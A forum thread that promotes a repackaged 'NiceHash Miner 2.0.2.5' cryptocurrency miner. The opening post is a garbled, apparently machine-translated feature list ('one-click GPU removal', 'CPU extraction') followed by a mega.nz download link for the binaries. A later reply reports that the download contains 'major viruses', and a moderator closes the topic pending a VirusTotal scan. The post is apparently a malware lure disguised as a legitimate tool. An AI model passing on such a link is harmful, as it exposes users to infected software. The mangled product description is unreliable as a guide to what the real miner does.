Sign in to follow this  
Zynrox

NiceHash Miner 2.0.2.5 easy to use CPU and GPU Miner

NiceHash Miner 2.0.2.5 easy to use CPU and GPU Miner

images?q=tbn:ANd9GcTh8OqK_BRewf9UaYe7qqnRZXF7W1EIyQHHkwknxgrtXMn-JllD

NiceHash Miner is an easy-to-use CPU and cryptocurrency mining GPU for Windows. With a simple intuitive graphical user interface that allows you to quickly convert your PC, workstation or server into the money mining machine to do cryptocurrency. Why leave your computer idle, while I could beat you Bitcoins with just a few clicks?

og.png

What are the benefits?

NiceHash Miner is essentially the only tool a miner needs. There is no need to go through tons of configuration files, various versions of mining software, configuration tuning or cryptocurrency currencies market analysis. Auto-tuning for the best performance and efficiency, automatic selection and automatic switching runtime to the most cost-effective cryptography algorithm are integrated into NiceHash Miner and will allow you seamless, cheerful and profitable mining experience.

Characteristics

Easy CPU monitoring with a single click for CPUs that support at least SSE2 (only works on Windows x32 x64).

Easy one-click GPU removal for NVIDIA GPUs using microarchitecture (computing power) SM 2.1 / 3.x / 5.x / 6.x.

One-click GPU mining for AMD GPUs with any AMD GPU device that supports OpenCL.

Compatibility with several CPUs in several NUMA with affinity settings to maximize the speed of mining.

Integrated support for Simple Multi-Algorithm. Always mine the most profitable algorithm.

Integrated benchmarking tool. Execute it only once before starting the mining and after each hardware / controller / software update.

Algorithms optimized for AVX2 and AVX (CPU mining).

Watch-feature - automatically restart the miner if it crashed or hung.

Shows the current speed and your balance in real time.

Automatic update notifications.

Much more…

Requirements

Windows 7 or a newer operating system 64 bits and 32 bits

For CPU extraction a modern CPU with SSE2 support

For AMD extraction of any AMD GPU with OpenCL support

For NVIDIA mining any NVIDIA GPU with computing capacity (SM) 2.1 or later

Updated drivers for all GPUs

Reliable Internet connectivity

Personal Bitcoin wallet:

P

Changes:

Excavator updated to v1.5.6a

Added the X16R algorithm for NVIDIA cards

Optimized Lyra2Z algorithm for NVIDIA cards

How to obtain and execute it?

All you have to do is download, extract and run the miner (no installation required), choose the location of the server closest to your location, execute a built-in benchmark and enter your Bitcoin wallet address where you want your coins sent to you. - and you are ready to start mining and maximize your profit.

Note: .NET Framework 2.0 or higher and Microsoft Visual C ++ Redistributable 2013 are required. No additional installations are required if you use Windows 7 or later. However, if you encounter any problems when starting the application (application might not start or errors / warnings about missing DLL files are displayed) you should download and install Microsoft .NET Framework 2.0 and Microsoft Visual C ++ Redistributable 2013 (vcredist_x64.exe) ) (after It may be necessary to restart the system).

nicehash-board.png

Where does the benefit come from?

As a back-end NiceHash Miner is based on the NiceHash.com service. When running NiceHash Miner you are essentially selling the hashing power of your CPUs and GPUs to the power hash buyers. Those are using the power of hashing to mine several cryptography coins and support decentralized blockchain networks - similar to cloud computing - only that running NiceHash Miner you are actually being a provider for the cryptocurrency energy of mining. You are being part of a global computer network, empowering decentralized digital currencies.

How to run NiceHash Miner only when profitability is high enough?

The profitability of mining can go up and down which can be unprofitable for the mine, especially places with high cost of electricity. By using the "MinimumProfit" setting, NiceHashMiner will stop mining if the current benefits are below the minimum amount (in USD). This will help you undermine during the "profitable" times only.

Download binaries from here:

[hide] https://mega.nz/#!nbpwmYxK!2eLbnxxFJ44sDLVLDcTutj2w1zuw2LakrtKiH6D1UIA

[/hide]

How to obtain and execute it?

All you have to do is download, extract and run the miner (no installation required), choose the location of the server closest to your location, execute a built-in benchmark and enter your Bitcoin wallet address where you want your coins sent to you. - and you are ready to start mining and maximize your profit.

2 minutes in and I have to install it

EDIT: don't download, major viruses

Added hide tags for you. However I am closing your topic until you personally send me a VT link for this tool.